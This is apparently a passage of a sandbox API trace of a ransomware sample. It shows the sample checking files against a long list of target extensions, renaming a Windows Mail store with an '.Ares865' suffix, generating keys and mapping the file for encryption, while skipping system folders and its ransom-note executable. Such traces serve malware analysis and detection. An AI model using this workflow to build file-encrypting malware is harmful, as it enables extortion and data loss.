(lpString1="tore", lpString2="vmdk") returned -1 [0062.843] lstrlenW (lpString="rar") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="rar") returned -1 [0062.843] lstrlenW (lpString="zip") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="zip") returned -1 [0062.843] lstrlenW (lpString="tgz") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="tgz") returned -1 [0062.843] lstrlenW (lpString="vbox") returned 4 [0062.843] lstrcmpiW (lpString1="tore", lpString2="vbox") returned -1 [0062.843] lstrlenW (lpString="vdi") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="vdi") returned -1 [0062.843] lstrlenW (lpString="vhd") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="vhd") returned -1 [0062.843] lstrlenW (lpString="vhdx") returned 4 [0062.843] lstrcmpiW (lpString1="tore", lpString2="vhdx") returned -1 [0062.843] lstrlenW (lpString="avhd") returned 4 [0062.843] lstrcmpiW (lpString1="tore", lpString2="avhd") returned 1 [0062.843] lstrlenW (lpString="db") returned 2 [0062.843] lstrcmpiW (lpString1="re", lpString2="db") returned 1 [0062.843] lstrlenW (lpString="db2") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="db2") returned 1 [0062.843] lstrlenW (lpString="db3") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="db3") returned 1 [0062.843] lstrlenW (lpString="dbf") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="dbf") returned 1 [0062.843] lstrlenW (lpString="mdf") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="mdf") returned 1 [0062.843] lstrlenW (lpString="mdb") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="mdb") returned 1 [0062.843] lstrlenW (lpString="sql") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="sql") returned -1 [0062.844] lstrlenW (lpString="sqlite") returned 6 [0062.844] lstrcmpiW (lpString1="eStore", lpString2="sqlite") returned -1 [0062.844] lstrlenW (lpString="sqlite3") returned 7 [0062.844] lstrcmpiW (lpString1="geStore", lpString2="sqlite3") returned -1 [0062.844] lstrlenW (lpString="sqlitedb") returned 8 [0062.844] lstrcmpiW (lpString1="ageStore", lpString2="sqlitedb") returned -1 [0062.844] lstrlenW (lpString="xml") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="xml") returned -1 [0062.844] lstrlenW (lpString="$er") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="$er") returned 1 [0062.844] lstrlenW (lpString="4dd") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="4dd") returned 1 [0062.844] lstrlenW (lpString="4dl") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="4dl") returned 1 [0062.844] lstrlenW (lpString="^^^") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="^^^") returned 1 [0062.844] lstrlenW (lpString="abs") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="abs") returned 1 [0062.844] lstrlenW (lpString="abx") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="abx") returned 1 [0062.844] lstrlenW (lpString="accdb") returned 5 [0062.844] lstrcmpiW (lpString1="Store", lpString2="accdb") returned 1 [0062.844] lstrlenW (lpString="accdc") returned 5 [0062.844] lstrcmpiW (lpString1="Store", lpString2="accdc") returned 1 [0062.844] lstrlenW (lpString="accde") returned 5 [0062.844] lstrcmpiW (lpString1="Store", lpString2="accde") returned 1 [0062.844] lstrlenW (lpString="accdr") returned 5 [0062.844] lstrcmpiW (lpString1="Store", lpString2="accdr") returned 1 [0062.844] lstrlenW (lpString="accdt") returned 5 [0062.844] lstrcmpiW (lpString1="Store", lpString2="accdt") returned 1 [0062.844] lstrlenW (lpString="accdw") returned 5 [0062.844] lstrcmpiW (lpString1="Store", lpString2="accdw") returned 1 [0062.844] lstrlenW (lpString="accft") returned 5 [0062.844] lstrcmpiW (lpString1="Store", lpString2="accft") returned 1 [0062.844] lstrlenW (lpString="adb") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="adb") returned 1 [0062.844] lstrlenW (lpString="adb") returned 3 [0062.844] lstrcmpiW (lpString1="ore", lpString2="adb") returned 1 [0062.844] lstrlenW (lpString="ade") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="ade") returned 1 [0062.845] lstrlenW (lpString="adf") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="adf") returned 1 [0062.845] lstrlenW (lpString="adn") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="adn") returned 1 [0062.845] lstrlenW (lpString="adp") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="adp") returned 1 [0062.845] lstrlenW (lpString="alf") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="alf") returned 1 [0062.845] lstrlenW (lpString="ask") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="ask") returned 1 [0062.845] lstrlenW (lpString="btr") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="btr") returned 1 [0062.845] lstrlenW (lpString="cat") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="cat") returned 1 [0062.845] lstrlenW (lpString="cdb") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="cdb") returned 1 [0062.845] lstrlenW (lpString="ckp") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="ckp") returned 1 [0062.845] lstrlenW (lpString="cma") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="cma") returned 1 [0062.845] lstrlenW (lpString="cpd") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="cpd") returned 1 [0062.845] lstrlenW (lpString="dacpac") returned 6 [0062.845] lstrcmpiW (lpString1="eStore", lpString2="dacpac") returned 1 [0062.845] lstrlenW (lpString="dad") returned 3 [0062.845] lstrcmpiW (lpString1="ore", lpString2="dad") returned 1 [0062.845] lstrlenW (lpString="dadiagrams") returned 10 [0062.845] lstrcmpiW (lpString1="ssageStore", lpString2="dadiagrams") returned 1 [0062.845] lstrlenW (lpString="daschema") returned 8 [0062.845] lstrcmpiW (lpString1="ageStore", lpString2="daschema") returned -1 [0062.845] lstrlenW (lpString="db-journal") returned 10 [0062.845] lstrcmpiW (lpString1="ssageStore", lpString2="db-journal") returned 1 [0062.845] lstrlenW (lpString="db-shm") returned 6 [0062.845] lstrcmpiW (lpString1="eStore", lpString2="db-shm") returned 1 [0062.845] lstrlenW (lpString="db-wal") returned 6 [0062.845] lstrcmpiW (lpString1="eStore", lpString2="db-wal") returned 1 [0062.845] lstrlenW (lpString="dbc") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dbc") returned 1 [0062.846] lstrlenW (lpString="dbs") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dbs") returned 1 [0062.846] lstrlenW (lpString="dbt") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dbt") returned 1 [0062.846] lstrlenW (lpString="dbv") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dbv") returned 1 [0062.846] lstrlenW (lpString="dbx") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dbx") returned 1 [0062.846] lstrlenW (lpString="dcb") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dcb") returned 1 [0062.846] lstrlenW (lpString="dct") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dct") returned 1 [0062.846] lstrlenW (lpString="dcx") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dcx") returned 1 [0062.846] lstrlenW (lpString="ddl") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="ddl") returned 1 [0062.846] lstrlenW (lpString="dlis") returned 4 [0062.846] lstrcmpiW (lpString1="tore", lpString2="dlis") returned 1 [0062.846] lstrlenW (lpString="dp1") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dp1") returned 1 [0062.846] lstrlenW (lpString="dqy") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dqy") returned 1 [0062.846] lstrlenW (lpString="dsk") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dsk") returned 1 [0062.846] lstrlenW (lpString="dsn") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dsn") returned 1 [0062.846] lstrlenW (lpString="dtsx") returned 4 [0062.846] lstrcmpiW (lpString1="tore", lpString2="dtsx") returned 1 [0062.846] lstrlenW (lpString="dxl") returned 3 [0062.846] lstrcmpiW (lpString1="ore", lpString2="dxl") returned 1 [0062.847] lstrlenW (lpString="eco") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="eco") returned 1 [0062.847] lstrlenW (lpString="ecx") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="ecx") returned 1 [0062.847] lstrlenW (lpString="edb") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="edb") returned 1 [0062.847] lstrlenW (lpString="epim") returned 4 [0062.847] lstrcmpiW (lpString1="tore", lpString2="epim") returned 1 [0062.847] lstrlenW (lpString="fcd") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fcd") returned 1 [0062.847] lstrlenW (lpString="fdb") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fdb") returned 1 [0062.847] lstrlenW (lpString="fic") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fic") returned 1 [0062.847] lstrlenW (lpString="flexolibrary") returned 12 [0062.847] lstrcmpiW (lpString1="MessageStore", lpString2="flexolibrary") returned 1 [0062.847] lstrlenW (lpString="fm5") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fm5") returned 1 [0062.847] lstrlenW (lpString="fmp") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fmp") returned 1 [0062.847] lstrlenW (lpString="fmp12") returned 5 [0062.847] lstrcmpiW (lpString1="Store", lpString2="fmp12") returned 1 [0062.847] lstrlenW (lpString="fmpsl") returned 5 [0062.847] lstrcmpiW (lpString1="Store", lpString2="fmpsl") returned 1 [0062.847] lstrlenW (lpString="fol") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fol") returned 1 [0062.847] lstrlenW (lpString="fp3") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fp3") returned 1 [0062.847] lstrlenW (lpString="fp4") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fp4") returned 1 [0062.847] lstrlenW (lpString="fp5") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fp5") returned 1 [0062.847] lstrlenW (lpString="fp7") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fp7") returned 1 [0062.847] lstrlenW (lpString="fpt") returned 3 [0062.847] lstrcmpiW (lpString1="ore", lpString2="fpt") returned 1 [0062.847] lstrlenW (lpString="frm") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="frm") returned 1 [0062.848] lstrlenW (lpString="gdb") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="gdb") returned 1 [0062.848] lstrlenW (lpString="gdb") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="gdb") returned 1 [0062.848] lstrlenW (lpString="grdb") returned 4 [0062.848] lstrcmpiW (lpString1="tore", lpString2="grdb") returned 1 [0062.848] lstrlenW (lpString="gwi") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="gwi") returned 1 [0062.848] lstrlenW (lpString="hdb") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="hdb") returned 1 [0062.848] lstrlenW (lpString="his") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="his") returned 1 [0062.848] lstrlenW (lpString="ib") returned 2 [0062.848] lstrcmpiW (lpString1="re", lpString2="ib") returned 1 [0062.848] lstrlenW (lpString="idb") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="idb") returned 1 [0062.848] lstrlenW (lpString="ihx") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="ihx") returned 1 [0062.848] lstrlenW (lpString="itdb") returned 4 [0062.848] lstrcmpiW (lpString1="tore", lpString2="itdb") returned 1 [0062.848] lstrlenW (lpString="itw") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="itw") returned 1 [0062.848] lstrlenW (lpString="jet") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="jet") returned 1 [0062.848] lstrlenW (lpString="jtx") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="jtx") returned 1 [0062.848] lstrlenW (lpString="kdb") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="kdb") returned 1 [0062.848] lstrlenW (lpString="kexi") returned 4 [0062.848] lstrcmpiW (lpString1="tore", lpString2="kexi") returned 1 [0062.848] lstrlenW (lpString="kexic") returned 5 [0062.848] lstrcmpiW (lpString1="Store", lpString2="kexic") returned 1 [0062.848] lstrlenW (lpString="kexis") returned 5 [0062.848] lstrcmpiW (lpString1="Store", lpString2="kexis") returned 1 [0062.848] lstrlenW (lpString="lgc") returned 3 [0062.848] lstrcmpiW (lpString1="ore", lpString2="lgc") returned 1 [0062.849] lstrlenW (lpString="lwx") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="lwx") returned 1 [0062.849] lstrlenW (lpString="maf") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="maf") returned 1 [0062.849] lstrlenW (lpString="maq") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="maq") returned 1 [0062.849] lstrlenW (lpString="mar") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mar") returned 1 [0062.849] lstrlenW (lpString="marshal") returned 7 [0062.849] lstrcmpiW (lpString1="geStore", lpString2="marshal") returned -1 [0062.849] lstrlenW (lpString="mas") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mas") returned 1 [0062.849] lstrlenW (lpString="mav") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mav") returned 1 [0062.849] lstrlenW (lpString="maw") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="maw") returned 1 [0062.849] lstrlenW (lpString="mdbhtml") returned 7 [0062.849] lstrcmpiW (lpString1="geStore", lpString2="mdbhtml") returned -1 [0062.849] lstrlenW (lpString="mdn") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mdn") returned 1 [0062.849] lstrlenW (lpString="mdt") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mdt") returned 1 [0062.849] lstrlenW (lpString="mfd") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mfd") returned 1 [0062.849] lstrlenW (lpString="mpd") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mpd") returned 1 [0062.849] lstrlenW (lpString="mrg") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mrg") returned 1 [0062.849] lstrlenW (lpString="mud") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mud") returned 1 [0062.849] lstrlenW (lpString="mwb") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="mwb") returned 1 [0062.849] lstrlenW (lpString="myd") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="myd") returned 1 [0062.849] lstrlenW (lpString="ndf") returned 3 [0062.849] lstrcmpiW (lpString1="ore", lpString2="ndf") returned 1 [0062.849] lstrlenW (lpString="nnt") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="nnt") returned 1 [0062.850] lstrlenW (lpString="nrmlib") returned 6 [0062.850] lstrcmpiW (lpString1="eStore", lpString2="nrmlib") returned -1 [0062.850] lstrlenW (lpString="ns2") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="ns2") returned 1 [0062.850] lstrlenW (lpString="ns3") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="ns3") returned 1 [0062.850] lstrlenW (lpString="ns4") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="ns4") returned 1 [0062.850] lstrlenW (lpString="nsf") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="nsf") returned 1 [0062.850] lstrlenW (lpString="nv") returned 2 [0062.850] lstrcmpiW (lpString1="re", lpString2="nv") returned 1 [0062.850] lstrlenW (lpString="nv2") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="nv2") returned 1 [0062.850] lstrlenW (lpString="nwdb") returned 4 [0062.850] lstrcmpiW (lpString1="tore", lpString2="nwdb") returned 1 [0062.850] lstrlenW (lpString="nyf") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="nyf") returned 1 [0062.850] lstrlenW (lpString="odb") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="odb") returned 1 [0062.850] lstrlenW (lpString="odb") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="odb") returned 1 [0062.850] lstrlenW (lpString="oqy") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="oqy") returned 1 [0062.850] lstrlenW (lpString="ora") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="ora") returned 1 [0062.850] lstrlenW (lpString="orx") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="orx") returned -1 [0062.850] lstrlenW (lpString="owc") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="owc") returned -1 [0062.850] lstrlenW (lpString="p96") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="p96") returned -1 [0062.850] lstrlenW (lpString="p97") returned 3 [0062.850] lstrcmpiW (lpString1="ore", lpString2="p97") returned -1 [0062.850] lstrlenW (lpString="pan") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="pan") returned -1 [0062.851] lstrlenW (lpString="pdb") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="pdb") returned -1 [0062.851] lstrlenW (lpString="pdm") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="pdm") returned -1 [0062.851] lstrlenW (lpString="pnz") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="pnz") returned -1 [0062.851] lstrlenW (lpString="qry") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="qry") returned -1 [0062.851] lstrlenW (lpString="qvd") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="qvd") returned -1 [0062.851] lstrlenW (lpString="rbf") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="rbf") returned -1 [0062.851] lstrlenW (lpString="rctd") returned 4 [0062.851] lstrcmpiW (lpString1="tore", lpString2="rctd") returned 1 [0062.851] lstrlenW (lpString="rod") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="rod") returned -1 [0062.851] lstrlenW (lpString="rodx") returned 4 [0062.851] lstrcmpiW (lpString1="tore", lpString2="rodx") returned 1 [0062.851] lstrlenW (lpString="rpd") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="rpd") returned -1 [0062.851] lstrlenW (lpString="rsd") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="rsd") returned -1 [0062.851] lstrlenW (lpString="sas7bdat") returned 8 [0062.851] lstrcmpiW (lpString1="ageStore", lpString2="sas7bdat") returned -1 [0062.851] lstrlenW (lpString="sbf") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="sbf") returned -1 [0062.851] lstrlenW (lpString="scx") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="scx") returned -1 [0062.851] lstrlenW (lpString="sdb") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="sdb") returned -1 [0062.851] lstrlenW (lpString="sdc") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="sdc") returned -1 [0062.851] lstrlenW (lpString="sdf") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="sdf") returned -1 [0062.851] lstrlenW (lpString="sis") returned 3 [0062.851] lstrcmpiW (lpString1="ore", lpString2="sis") returned -1 [0062.851] lstrlenW (lpString="spq") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="spq") returned -1 [0062.852] lstrlenW (lpString="te") returned 2 [0062.852] lstrcmpiW (lpString1="re", lpString2="te") returned -1 [0062.852] lstrlenW (lpString="teacher") returned 7 [0062.852] lstrcmpiW (lpString1="geStore", lpString2="teacher") returned -1 [0062.852] lstrlenW (lpString="tmd") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="tmd") returned -1 [0062.852] lstrlenW (lpString="tps") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="tps") returned -1 [0062.852] lstrlenW (lpString="trc") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="trc") returned -1 [0062.852] lstrlenW (lpString="trc") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="trc") returned -1 [0062.852] lstrlenW (lpString="trm") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="trm") returned -1 [0062.852] lstrlenW (lpString="udb") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="udb") returned -1 [0062.852] lstrlenW (lpString="udl") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="udl") returned -1 [0062.852] lstrlenW (lpString="usr") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="usr") returned -1 [0062.852] lstrlenW (lpString="v12") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="v12") returned -1 [0062.852] lstrlenW (lpString="vis") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="vis") returned -1 [0062.852] lstrlenW (lpString="vpd") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="vpd") returned -1 [0062.852] lstrlenW (lpString="vvv") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="vvv") returned -1 [0062.852] lstrlenW (lpString="wdb") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="wdb") returned -1 [0062.852] lstrlenW (lpString="wmdb") returned 4 [0062.852] lstrcmpiW (lpString1="tore", lpString2="wmdb") returned -1 [0062.852] lstrlenW (lpString="wrk") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="wrk") returned -1 [0062.852] lstrlenW (lpString="xdb") returned 3 [0062.852] lstrcmpiW (lpString1="ore", lpString2="xdb") returned -1 [0062.853] lstrlenW (lpString="xld") returned 3 [0062.853] lstrcmpiW (lpString1="ore", lpString2="xld") returned -1 [0062.853] lstrlenW (lpString="xmlff") returned 5 [0062.853] lstrcmpiW (lpString1="Store", lpString2="xmlff") returned -1 [0062.853] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.Ares865") returned 94 [0062.853] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\windowsmail.msmessagestore.ares865"), dwFlags=0x1) returned 1 [0062.854] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\windowsmail.msmessagestore.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0062.854] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2113536) returned 1 [0062.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0062.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0062.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0062.855] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0062.856] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0062.856] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.856] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x204300, lpName=0x0) returned 0x164 [0062.857] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x4300) returned 0x190000 [0062.877] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3450000 [0063.278] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.287] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.287] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.288] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.288] CloseHandle (hObject=0x164) returned 1 [0063.288] CloseHandle (hObject=0x154) returned 1 [0063.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.299] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2e234eb, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="aoldtz.exe") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="..") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="windows") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="bootmgr") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="temp") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="pagefile.sys") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="boot") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="ids.txt") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="ntuser.dat") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="perflogs") returned 1 [0063.299] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="MSBuild") returned 1 [0063.299] lstrlenW (lpString="WindowsMail.pat") returned 15 [0063.299] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 86 [0063.299] lstrcpyW (in: lpString1=0x2cce478, lpString2="WindowsMail.pat" | out: lpString1="WindowsMail.pat") 